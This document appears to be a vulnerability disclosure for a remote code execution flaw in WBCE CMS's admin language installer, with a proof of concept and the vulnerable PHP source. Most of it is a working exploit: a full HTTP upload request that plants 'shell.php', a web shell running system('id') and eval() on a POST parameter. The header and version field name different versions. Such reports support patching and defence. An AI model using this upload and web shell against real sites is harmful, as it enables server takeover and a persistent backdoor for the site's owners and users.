WBCE CMS 1.5.3 has a RCE via admin/languages/install.php.
Vendor Homepage:
WBCE/WBCE_CMS: Core package of WBCE CMS. This package includes the core and the default addons. Visit https://wbce.org (DE) or https://wbce-cms.org (EN) to learn more or to join the WBCE CMS community. (github.com)
Version:
1.6.1
Tested On:
Macos, review source code
Affected Page:
/admin/languages/install.php
Description:
Filter upload file shell PHP that can lead to RCE
Proof of Concept:
1. Upload file JPG in 'addon' function, then intercept request and modify 'content' with PHP code to execute command 'id':
Request:
POST /WBCE_CMSqksqgs2pqh/admin/languages/install.php HTTP/1.1
Host: demos6.softaculous.com
Cookie: phpsessid-8761-sid=f6bfe0764075c4c650d02490c0fa9157; WBCELastConnectJS=1685500501; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3829376736871544652353812955
Content-Length: 554
Origin: https://demos6.softaculous.com
Referer: https://demos6.softaculous.com/WBCE_CMSqksqgs2pqh/admin/languages/index.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-Pwnfox-Color: green
Te: trailers
Connection: close
-----------------------------3829376736871544652353812955
Content-Disposition: form-data; name="formtoken"
361e4013-84a8d424d129d4c07f86bc1c3b1fede1d254dfdd
-----------------------------3829376736871544652353812955
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: application/octet-stream
<?php echo(system('id'));@eval($_POST[stcs]);?>
-----------------------------3829376736871544652353812955
Content-Disposition: form-data; name="submit"
-----------------------------3829376736871544652353812955--
SOURCE CODE VULNERABLE
/admin/languages /install.php
// Create unique file within WBCE /temp folder
$temp_dir = WB_PATH . '/temp/';
$temp_file = tempnam($temp_dir, 'wb_');
// Move uploaded file into WBCE /temp folder
if (!move_uploaded_file($_FILES['userfile']['tmp_name'], $temp_file)) {
if (file_exists($temp_file)) {
unlink($temp_file);
}
$admin->print_error($MESSAGE['GENERIC_CANNOT_UPLOAD']);
}
// Check if uploaded file is a valid language file (no binary file etc.)
$content = file_get_contents($temp_file);
if (strpos($content, '<?php') === false) {
$admin->print_error($MESSAGE['GENERIC_INVALID_LANGUAGE_FILE']);
}